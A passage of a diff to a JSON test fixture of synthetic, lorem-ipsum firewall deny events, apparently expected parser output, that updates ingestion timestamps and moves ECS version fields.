enim5316.www5.local proto=ipv6-icmp service=smtp status=deny src=10.202.72.124 dst=10.200.188.142 src_port=4665 dst_port=7143 server_app=omnis pid=2061 app_name=eip traff_direct=external block_count=513 logon_user=iusmodt@doloreeu3553.www5.home msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234009100Z" + "ingested": "2021-12-14T14:42:59.419343509Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 24 00:25:25 reetdolo2770.www5.local proto=tcp service=pop3 status=deny src=10.12.44.169 dst=10.214.225.125 src_port=5710 dst_port=2121 server_app=inBCSedu pid=5722 app_name=tanimi traff_direct=outbound block_count=6071 logon_user=erep@iutal13.api.localdomain msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234013400Z" + "ingested": "2021-12-14T14:42:59.419343927Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 8 07:27:59 isiu1114.internal.corp proto=icmp service=http status=deny src=10.66.108.11 dst=10.198.136.50 src_port=6875 dst_port=2089 server_app=ipis pid=5037 app_name=ari traff_direct=unknown block_count=3856 logon_user=uptatev@uovol492.www.localhost msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234018400Z" + "ingested": "2021-12-14T14:42:59.419344344Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 22 14:30:33 usmodte1296.www.corp proto=igmp service=ms-wbt-server status=deny src=10.178.244.31 dst=10.69.20.77 src_port=3857 dst_port=7579 server_app=nonnu pid=776 app_name=riat traff_direct=unknown block_count=5575 logon_user=umdolor@osquir6997.corp msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234023Z" + "ingested": "2021-12-14T14:42:59.419344729Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 5 21:33:08 tatno4987.www5.localhost proto=ggp service=pop3 status=deny src=10.54.231.100 dst=10.203.5.162 src_port=5616 dst_port=7290 server_app=iam pid=6096 app_name=ciati traff_direct=unknown block_count=3162 logon_user=umdolore@eniam7007.api.invalid msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234027200Z" + "ingested": "2021-12-14T14:42:59.419345112Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 20 04:35:42 tatno6787.internal.localhost proto=icmp service=pop3 status=deny src=10.65.83.160 dst=10.136.252.240 src_port=3592 dst_port=4105 server_app=uradi pid=7307 app_name=essequ traff_direct=outbound block_count=7148 logon_user=ender@snulapar3794.api.domain msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234031600Z" + "ingested": "2021-12-14T14:42:59.419345514Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 4 11:38:16 essecill2595.mail.local proto=ggp service=http status=deny src=10.57.40.29 dst=10.210.213.18 src_port=7616 dst_port=3970 server_app=atuse pid=2703 app_name=uis traff_direct=internal block_count=6179 logon_user=onse@liq5883.localdomain msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234035400Z" + "ingested": "2021-12-14T14:42:59.419346400Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 18 18:40:50 ali6446.localhost proto=udp service=smtp status=deny src=10.144.82.69 dst=10.200.156.102 src_port=2896 dst_port=6061 server_app=rporis pid=5166 app_name=par traff_direct=outbound block_count=7041 logon_user=rveli@rsint7026.test msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234040300Z" + "ingested": "2021-12-14T14:42:59.419346801Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2 01:43:25 torev7118.internal.domain proto=ipv6 service=smtp status=deny src=10.109.232.112 dst=10.72.58.135 src_port=5160 dst_port=2382 server_app=fugit pid=7668 app_name=rsitamet traff_direct=internal block_count=1112 logon_user=xea@qua2945.www.local msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234046600Z" + "ingested": "2021-12-14T14:42:59.419347191Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 16 08:45:59 dolore6103.www5.example proto=udp service=http status=deny src=10.38.22.45 dst=10.72.29.73 src_port=1493 dst_port=203 server_app=piscing pid=1044 app_name=entsu traff_direct=unknown block_count=4979 logon_user=onproide@luptat6494.www.example msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234052800Z" + "ingested": "2021-12-14T14:42:59.419347606Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 30 15:48:33 errorsi6996.www.domain proto=tcp service=smtp status=deny src=10.70.95.74 dst=10.76.72.111 src_port=6119 dst_port=7388 server_app=emaperi pid=7183 app_name=sumquiad traff_direct=internal block_count=2362 logon_user=ivelits@moenimi6317.internal.invalid msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234059Z" + "ingested": "2021-12-14T14:42:59.419348095Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 13 22:51:07 lumquido5839.api.corp proto=ipv6 service=https status=deny src=10.19.201.13 dst=10.73.69.75 src_port=5006 dst_port=6218 server_app=nsec pid=6907 app_name=estqu traff_direct=unknown block_count=2655 logon_user=tat@tion1761.home msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234065300Z" + "ingested": "2021-12-14T14:42:59.419348599Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 28 05:53:42 aperia4409.www5.invalid proto=rdp service=ms-wbt-server status=deny src=10.78.151.178 dst=10.84.105.75 src_port=1846 dst_port=98 server_app=uames pid=499 app_name=msequi traff_direct=external block_count=4085 logon_user=iquaUten@santium4235.api.local msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234071500Z" + "ingested": "2021-12-14T14:42:59.419348997Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 12 12:56:16 tem2496.api.lan proto=rdp service=ms-wbt-server status=deny src=10.135.233.146 dst=10.25.192.202 src_port=4181 dst_port=6462 server_app=ents pid=1531 app_name=Loremip traff_direct=internal block_count=4610 logon_user=emeumfu@CSed2857.www5.example msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234077800Z" + "ingested": "2021-12-14T14:42:59.419349389Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 26 19:58:50 eme6710.mail.invalid proto=rdp service=https status=deny src=10.121.219.204 dst=10.104.134.200 src_port=3611 dst_port=2508 server_app=reetd pid=6051 app_name=quae traff_direct=outbound block_count=7084 logon_user=uptat@equep5085.mail.domain msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234084Z" + "ingested": "2021-12-14T14:42:59.419349774Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 10 03:01:24 ihilm1669.mail.invalid proto=tcp service=https status=deny src=10.191.105.82 dst=10.225.160.182 src_port=3361 dst_port=4810 server_app=uovolup pid=6994 app_name=llu traff_direct=external block_count=3936 logon_user=eirure@conseq557.mail.lan msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234090200Z" + "ingested": "2021-12-14T14:42:59.419350158Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 24 10:03:59 umexerci1284.internal.localdomain proto=rdp service=smtp status=deny src=10.141.44.153 dst=10.161.57.8 src_port=3750 dst_port=2716 server_app=oei pid=5200 app_name=snostrud traff_direct=inbound block_count=3333 logon_user=quisnos@ite2026.www.invalid msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234096700Z" + "ingested": "2021-12-14T14:42:59.419350542Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 8 17:06:33 adol485.example proto=udp service=https status=deny src=10.153.111.103 dst=10.6.167.7 src_port=4977 dst_port=2022 server_app=taevit pid=3365 app_name=nsecte traff_direct=internal block_count=7424 logon_user=eumfug@lit5929.test msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234102900Z" + "ingested": "2021-12-14T14:42:59.419350932Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 23 00:09:07 evita5008.www.localdomain proto=ggp service=pop3 status=deny src=10.248.204.182 dst=10.134.148.219 src_port=1331 dst_port=4430 server_app=tmo pid=1835 app_name=abi traff_direct=inbound block_count=4168 logon_user=uioffi@oru6938.invalid msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234112600Z" + "ingested": "2021-12-14T14:42:59.419351451Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 6 07:11:41 tsedqu2456.www5.invalid proto=ipv6 service=smtp status=deny src=10.178.77.231 dst=10.163.5.243 src_port=5294 dst_port=4129 server_app=xerc pid=2019 app_name=hitecto traff_direct=unknown block_count=1123 logon_user=liquide@etdol5473.local msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234119100Z" + "ingested": "2021-12-14T14:42:59.419351849Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 20 14:14:16 ris3314.mail.invalid proto=ggp service=smtp status=deny src=10.177.194.18 dst=10.221.89.228 src_port=766 dst_port=2447 server_app=uamei pid=2493 app_name=aera traff_direct=outbound block_count=1747 logon_user=aliquam@nimid893.mail.corp msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234125400Z" + "ingested": "2021-12-14T14:42:59.419352229Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 3 21:16:50 reme622.mail.example proto=icmp service=ms-wbt-server status=deny src=10.241.65.49 dst=10.32.239.1 src_port=3027 dst_port=3128 server_app=dictasu pid=3022 app_name=catc traff_direct=unknown block_count=3522 logon_user=idata@rumwritt6003.host msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234131600Z" + "ingested": "2021-12-14T14:42:59.419352621Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 18 04:19:24 non3341.mail.invalid proto=ggp service=http status=deny src=10.168.90.81 dst=10.101.57.120 src_port=6866 dst_port=6501 server_app=laboree pid=2328 app_name=intocc traff_direct=internal block_count=5516 logon_user=eporr@xeacomm6855.api.corp msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234137100Z" + "ingested": "2021-12-14T14:42:59.419353007Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 4 11:21:59 ris727.api.local proto=tcp service=ms-wbt-server status=deny src=10.14.211.43 dst=10.130.14.60 src_port=4456 dst_port=2051 server_app=autfu pid=1156 app_name=tessec traff_direct=external block_count=7200 logon_user=litse@icabo4125.mail.domain msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234140900Z" + "ingested": "2021-12-14T14:42:59.419353396Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 18 18:24:33 stquido5705.api.host proto=icmp service=http status=deny src=10.60.129.15 dst=10.248.101.25 src_port=106 dst_port=5740 server_app=Nequepo pid=6003 app_name=pora traff_direct=unknown block_count=6437 logon_user=evolup@ionofdeF5643.www.localhost msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234145700Z" + "ingested": "2021-12-14T14:42:59.419353841Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2 01:27:07 etcons7378.api.lan proto=tcp service=https status=deny src=10.72.93.28 dst=10.111.187.12 src_port=3577 dst_port=3994 server_app=aper pid=5651 app_name=tur traff_direct=inbound block_count=3427 logon_user=niamqui@orem6702.invalid msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234151300Z" + "ingested": "2021-12-14T14:42:59.419354233Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 16 08:29:41 vita2681.www5.local proto=icmp service=ms-wbt-server status=deny src=10.27.14.168 dst=10.66.2.232 src_port=2224 dst_port=5764 server_app=fugiatn pid=3470 app_name=ipsumd traff_direct=outbound block_count=6708 logon_user=uirati@oin6780.mail.domain msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234156600Z" + "ingested": "2021-12-14T14:42:59.419354635Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 30 15:32:16 tnulapa7592.www.local proto=ggp service=ms-wbt-server status=deny src=10.75.99.127 dst=10.195.2.130 src_port=1766 dst_port=202 server_app=mporin pid=6932 app_name=nisiuta traff_direct=internal block_count=3828 logon_user=inibusB@eprehen3224.www5.localdomain msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234160900Z" + "ingested": "2021-12-14T14:42:59.419355022Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 14 22:34:50 lup2134.www.localhost proto=ipv6 service=pop3 status=deny src=10.201.238.90 dst=10.245.104.182 src_port=3759 dst_port=55 server_app=ccaecat pid=6945 app_name=onsequ traff_direct=outbound block_count=4198 logon_user=ovol@ptasn6599.www.localhost msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234165900Z" + "ingested": "2021-12-14T14:42:59.419355403Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 29 05:37:24 tanimid3337.mail.corp proto=ipv6-icmp service=http status=deny src=10.217.150.196 dst=10.105.91.31 src_port=2056 dst_port=5987 server_app=loreme pid=853 app_name=psumquia traff_direct=external block_count=4444 logon_user=con@nisist2752.home msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234170400Z" + "ingested": "2021-12-14T14:42:59.419355907Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 12 12:39:58 eumiu765.api.lan proto=ipv6-icmp service=https status=deny src=10.4.157.1 dst=10.184.18.202 src_port=52 dst_port=205 server_app=ofdeFini pid=4153 app_name=molli traff_direct=outbound block_count=725 logon_user=oditem@gitsedqu2649.mail.lan msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234174500Z" + "ingested": "2021-12-14T14:42:59.419356287Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 26 19:42:33 mquelau5326.mail.lan proto=icmp service=https status=deny src=10.255.39.252 dst=10.113.95.59 src_port=863 dst_port=4367 server_app=fugitsed pid=1693 app_name=idolo traff_direct=internal block_count=3147 logon_user=persp@entsunt3962.www.example msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234178900Z" + "ingested": "2021-12-14T14:42:59.419356683Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 11 02:45:07 idestlab2631.www.lan proto=tcp service=http status=deny src=10.27.16.118 dst=10.83.177.2 src_port=18 dst_port=1827 server_app=iat pid=337 app_name=rinre traff_direct=internal block_count=1300 logon_user=borios@tut2703.www.host msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234182700Z" + "ingested": "2021-12-14T14:42:59.419357073Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 25 09:47:41 inesci6789.test proto=udp service=http status=deny src=10.38.54.72 dst=10.167.227.44 src_port=6595 dst_port=5736 server_app=lillum pid=7041 app_name=its traff_direct=outbound block_count=7644 logon_user=riamea@entorev160.test msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234187500Z" + "ingested": "2021-12-14T14:42:59.419357474Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 8 16:50:15 ccaeca7077.internal.corp proto=tcp service=http status=deny src=10.216.54.184 dst=10.215.205.216 src_port=1495 dst_port=647 server_app=riat pid=3854 app_name=psaquaea traff_direct=external block_count=7536 logon_user=ameiusm@proide3714.mail.localdomain msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234193700Z" + "ingested": "2021-12-14T14:42:59.419357864Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 22 23:52:50 ima2031.api.corp proto=igmp service=smtp status=deny src=10.9.12.248 dst=10.9.18.237 src_port=765 dst_port=2486 server_app=tpersp pid=55 app_name=seosqui traff_direct=internal block_count=6379 logon_user=uradi@tot5313.mail.invalid msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234200Z" + "ingested": "2021-12-14T14:42:59.419358249Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 6 06:55:24 ian867.internal.corp proto=rdp service=https status=deny src=10.83.130.226 dst=10.41.123.102 src_port=1542 dst_port=2300 server_app=odoconse pid=228 app_name=quatu traff_direct=external block_count=7661 logon_user=tenim@rumet3801.internal.domain msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234206100Z" + "ingested": "2021-12-14T14:42:59.419358636Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 20 13:57:58 lorin4249.corp proto=tcp service=pop3 status=deny src=10.175.112.197 dst=10.80.152.108 src_port=1749 dst_port=2742 server_app=exeacom pid=4253 app_name=rita traff_direct=outbound block_count=6984 logon_user=tametcon@liqua2834.www5.lan msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234212300Z" + "ingested": "2021-12-14T14:42:59.419359028Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 4 21:00:32 gnaaliqu3935.api.test proto=udp service=smtp status=deny src=10.134.18.114 dst=10.142.25.100 src_port=2761 dst_port=5770 server_app=mdol pid=2200 app_name=nby traff_direct=internal block_count=624 logon_user=osqui@sequat7273.api.host msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234218500Z" + "ingested": "2021-12-14T14:42:59.419359466Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 19 04:03:07 nsequat1859.internal.localhost proto=udp service=http status=deny src=10.28.118.160 dst=10.223.119.218 src_port=6247 dst_port=300 server_app=umexerc pid=5717 app_name=intocc traff_direct=internal block_count=4387 logon_user=ntsunt@uidol4575.localhost msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234224600Z" + "ingested": "2021-12-14T14:42:59.419359860Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 2 11:05:41 ritin2495.api.corp proto=ggp service=https status=deny src=10.110.114.175 dst=10.47.28.48 src_port=4986 dst_port=3032 server_app=tatem pid=4469 app_name=luptat traff_direct=unknown block_count=4488 logon_user=plicab@oremq2000.api.corp msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234230800Z" + "ingested": "2021-12-14T14:42:59.419360245Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 16 18:08:15 tetur2694.mail.local proto=ggp service=pop3 status=deny src=10.40.251.202 dst=10.90.33.138 src_port=5733 dst_port=7876 server_app=enimadmi pid=5524 app_name=lupta traff_direct=external block_count=6847 logon_user=nvolupt@oremi1485.api.localhost msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234236900Z" + "ingested": "2021-12-14T14:42:59.419360625Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 1 01:10:49 rem7043.localhost proto=ipv6 service=ms-wbt-server status=deny src=10.65.2.106 dst=10.227.173.252 src_port=5410 dst_port=5337 server_app=nisiut pid=3624 app_name=teturad traff_direct=external block_count=7576 logon_user=itation@sequatD5469.www5.lan msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234243100Z" + "ingested": "2021-12-14T14:42:59.419362054Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 15 08:13:24 emqu2846.internal.home proto=udp service=https status=deny src=10.193.233.229 dst=10.28.84.106 src_port=2859 dst_port=4844 server_app=eaqu pid=1609 app_name=uptatemU traff_direct=inbound block_count=3096 logon_user=tla@item2738.test msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234249300Z" + "ingested": "2021-12-14T14:42:59.419362468Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 29 15:15:58 dqu6144.api.localhost proto=ggp service=ms-wbt-server status=deny src=10.150.245.88 dst=10.210.89.183 src_port=3642 dst_port=2589 server_app=ulpa pid=6248 app_name=iusmodte traff_direct=external block_count=2700 logon_user=sequa@iosamnis1047.internal.localdomain msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234255400Z" + "ingested": "2021-12-14T14:42:59.419362862Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 12 22:18:32 giatquov1918.internal.example proto=udp service=ms-wbt-server status=deny src=10.180.195.43 dst=10.85.185.13 src_port=4540 dst_port=7793 server_app=gnaal pid=7224 app_name=proident traff_direct=outbound block_count=1867 logon_user=voluptas@orroq6677.internal.example msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234261900Z" + "ingested": "2021-12-14T14:42:59.419363391Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 27 05:21:06 estl5804.internal.local proto=udp service=ms-wbt-server status=deny src=10.207.211.230 dst=10.210.28.247 src_port=3449 dst_port=7257 server_app=ssecil pid=430 app_name=iuntNe traff_direct=unknown block_count=7672 logon_user=tate@onevo4326.internal.local msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234268200Z" + "ingested": "2021-12-14T14:42:59.419363779Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 10 12:23:41 Sedut1775.www.domain proto=rdp service=ms-wbt-server status=deny src=10.86.11.48 dst=10.248.165.185 src_port=3436 dst_port=5460 server_app=olorsi pid=3589 app_name=exeaco traff_direct=external block_count=4801 logon_user=dquiac@itaedict7233.mail.localdomain msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234273Z" + "ingested": "2021-12-14T14:42:59.419364192Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 24 19:26:15 mac7484.www5.test proto=ipv6-icmp service=http status=deny src=10.118.6.177 dst=10.47.125.38 src_port=6977 dst_port=3896 server_app=isn pid=4814 app_name=omm traff_direct=outbound block_count=1844 logon_user=quunt@numquam5869.internal.example msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234278500Z" + "ingested": "2021-12-14T14:42:59.419364587Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 11 02:28:49 oin1140.mail.localhost proto=icmp service=pop3 status=deny src=10.50.233.155 dst=10.60.142.127 src_port=1081 dst_port=5112 server_app=urExce pid=276 app_name=nturm traff_direct=outbound block_count=2241 logon_user=atv@onu6137.api.home msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234284200Z" + "ingested": "2021-12-14T14:42:59.419364985Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 25 09:31:24 naaliq3710.api.local proto=rdp service=http status=deny src=10.28.82.189 dst=10.120.10.211 src_port=3916 dst_port=7661 server_app=odt pid=2452 app_name=inv traff_direct=internal block_count=7705 logon_user=rcit@aecatcup2241.www5.test msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234294800Z" + "ingested": "2021-12-14T14:42:59.419365371Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 8 16:33:58 volupta3552.internal.localhost proto=ipv6 service=pop3 status=deny src=10.31.237.225 dst=10.6.38.163 src_port=6153 dst_port=4059 server_app=oreveri pid=3453 app_name=avolu traff_direct=inbound block_count=2820 logon_user=olup@labor6360.mail.local msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234300200Z" + "ingested": "2021-12-14T14:42:59.419365762Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 22 23:36:32 onse380.internal.localdomain proto=ggp service=https status=deny src=10.226.5.189 dst=10.125.165.144 src_port=3371 dst_port=7889 server_app=dexerc pid=2302 app_name=tatem traff_direct=inbound block_count=5407 logon_user=mvolu@mveleum4322.www5.host msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234306900Z" + "ingested": "2021-12-14T14:42:59.419366148Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 7 06:39:06 queips4947.mail.example proto=udp service=smtp status=deny src=10.97.149.97 dst=10.46.56.204 src_port=2463 dst_port=5070 server_app=uela pid=7079 app_name=umf traff_direct=unknown block_count=2441 logon_user=dolorsit@archite1843.mail.home msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234312Z" + "ingested": "2021-12-14T14:42:59.419366539Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 21 13:41:41 oloreseo5039.test proto=ggp service=https status=deny src=10.218.0.197 dst=10.28.105.124 src_port=7581 dst_port=4797 server_app=eritin pid=5773 app_name=litsedq traff_direct=outbound block_count=5749 logon_user=ntNe@itanim4024.api.example msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234316200Z" + "ingested": "2021-12-14T14:42:59.419366927Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 4 20:44:15 minim459.mail.local proto=rdp service=https status=deny src=10.123.199.198 dst=10.17.87.79 src_port=6332 dst_port=3414 server_app=tionula pid=1586 app_name=ate traff_direct=outbound block_count=5006 logon_user=ratvolu@nreprehe715.api.home msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234320800Z" + "ingested": "2021-12-14T14:42:59.419367309Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 19 03:46:49 eratv211.api.host proto=rdp service=https status=deny src=10.38.86.177 dst=10.115.68.40 src_port=5768 dst_port=5483 server_app=boNem pid=5137 app_name=ssusci traff_direct=internal block_count=2841 logon_user=mpo@unte893.internal.host msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234324700Z" + "ingested": "2021-12-14T14:42:59.419367702Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 3 10:49:23 aparia1179.www.localdomain proto=tcp service=https status=deny src=10.193.118.163 dst=10.115.174.107 src_port=548 dst_port=5597 server_app=acom pid=5704 app_name=dolorem traff_direct=internal block_count=10 logon_user=exeacomm@aspe951.mail.domain msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234329600Z" + "ingested": "2021-12-14T14:42:59.419368087Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 17 17:51:58 iatqu6203.mail.corp proto=icmp service=http status=deny src=10.37.128.49 dst=10.77.77.208 src_port=625 dst_port=1101 server_app=esci pid=2310 app_name=essecill traff_direct=external block_count=2653 logon_user=moles@dipiscin4957.www.home msg=unknown", "event": 